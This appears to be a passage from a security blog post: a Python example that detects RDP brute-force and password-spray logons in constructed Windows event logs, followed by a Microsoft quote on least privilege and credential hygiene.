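As an added example (not from Microsoft or BleepingComputer), the following Python runs a brute-force detector over constructed Windows Security log lines: failed logons (event 4625) with LogonType 10, the RemoteInteractive type an RDP session uses, are counted per source address in a sliding window, and a later successful logon (4624) from a flagged address is raised as a higher-priority alert. The flattened log line format and the events themselves are constructed for illustration:

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List

# Added example over constructed log lines modelled on Windows Security
# events 4625 (logon failed) and 4624 (logon succeeded). LogonType 10 is
# RemoteInteractive, i.e. an RDP session. These are not logs from any real host.


@dataclass(frozen=True)
class LogonEvent:
    time: datetime
    event_id: int
    logon_type: int
    source_ip: str
    user: str


@dataclass(frozen=True)
class Alert:
    kind: str
    source_ip: str
    attempts: int
    users: tuple
    time: datetime


def parse_line(line: str) -> LogonEvent:
    """Parses one constructed 'timestamp Key=Value ...' line."""
    ts, kv = line.split(maxsplit=1)
    fields = dict(item.split("=", 1) for item in kv.split())
    return LogonEvent(
        time=datetime.fromisoformat(ts.replace("Z", "+00:00")),
        event_id=int(fields["EventID"]),
        logon_type=int(fields["LogonType"]),
        source_ip=fields["IpAddress"],
        user=fields["TargetUserName"].lower(),
    )


def detect_rdp_bruteforce(events: List[LogonEvent], threshold: int = 5,
                          window: timedelta = timedelta(minutes=5)) -> List[Alert]:
    """Sliding-window count of failed RDP logons per source IP.

    Raises one alert when a source crosses `threshold` failures inside
    `window`, and a second, higher-priority alert if that source then logs
    on successfully (a guessed or sprayed password that worked).
    """
    recent = defaultdict(deque)  # source_ip -> deque of (time, user) failures
    flagged = set()
    alerts = []
    for e in sorted(events, key=lambda ev: ev.time):
        if e.logon_type != 10:
            continue  # console/network logons are a different detection
        q = recent[e.source_ip]
        if e.event_id == 4625:
            q.append((e.time, e.user))
            while q and e.time - q[0][0] > window:
                q.popleft()
            if len(q) >= threshold and e.source_ip not in flagged:
                flagged.add(e.source_ip)
                alerts.append(Alert("rdp_bruteforce", e.source_ip, len(q),
                                    tuple(sorted({u for _, u in q})), e.time))
        elif e.event_id == 4624 and e.source_ip in flagged:
            alerts.append(Alert("rdp_bruteforce_success", e.source_ip, len(q),
                                (e.user,), e.time))
    return alerts


# Constructed sample: a spray from 203.0.113.7 that eventually lands, two
# stray failures from another address, and a local (LogonType 2) failure.
SAMPLE_LOG = """\
2021-06-23T10:00:01Z EventID=4625 LogonType=10 IpAddress=203.0.113.7 TargetUserName=Administrator
2021-06-23T10:00:09Z EventID=4625 LogonType=10 IpAddress=203.0.113.7 TargetUserName=admin
2021-06-23T10:00:17Z EventID=4625 LogonType=10 IpAddress=203.0.113.7 TargetUserName=backup
2021-06-23T10:00:20Z EventID=4625 LogonType=10 IpAddress=198.51.100.9 TargetUserName=jsmith
2021-06-23T10:00:25Z EventID=4625 LogonType=10 IpAddress=203.0.113.7 TargetUserName=scanner
2021-06-23T10:00:33Z EventID=4625 LogonType=10 IpAddress=203.0.113.7 TargetUserName=helpdesk
2021-06-23T10:00:40Z EventID=4625 LogonType=2 IpAddress=127.0.0.1 TargetUserName=jsmith
2021-06-23T10:00:41Z EventID=4625 LogonType=10 IpAddress=203.0.113.7 TargetUserName=helpdesk
2021-06-23T10:00:55Z EventID=4625 LogonType=10 IpAddress=198.51.100.9 TargetUserName=jsmith
2021-06-23T10:01:02Z EventID=4624 LogonType=10 IpAddress=203.0.113.7 TargetUserName=helpdesk
"""


def run_sample() -> List[Alert]:
    return detect_rdp_bruteforce([parse_line(l) for l in SAMPLE_LOG.splitlines()])


if __name__ == "__main__":
    for a in run_sample():
        print(f"{a.time:%H:%M:%S} {a.kind} from {a.source_ip}: "
              f"{a.attempts} failures, users {', '.join(a.users)}")
```

The list of usernames tried is kept on the alert on purpose: many distinct accounts from one address is a password spray, many failures against one account is a classic brute force, and the response (lock the account, or block the source and reset the account that was finally guessed) differs.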
In the blog post "Human-operated ransomware attacks: A preventable disaster," Microsoft 365 Defender Threat Intelligence Team recommends practicing the principle of least privilege and maintaining credential hygiene. “Avoid the use of domain-wide, admin-level service accounts,” Microsoft 365 Defender Threat Intelligence Team said. “Enforce strong randomized, just-in-time local administrator passwords. Use tools like LAPS.”
Steve E. Driz, I.S.P., ITCP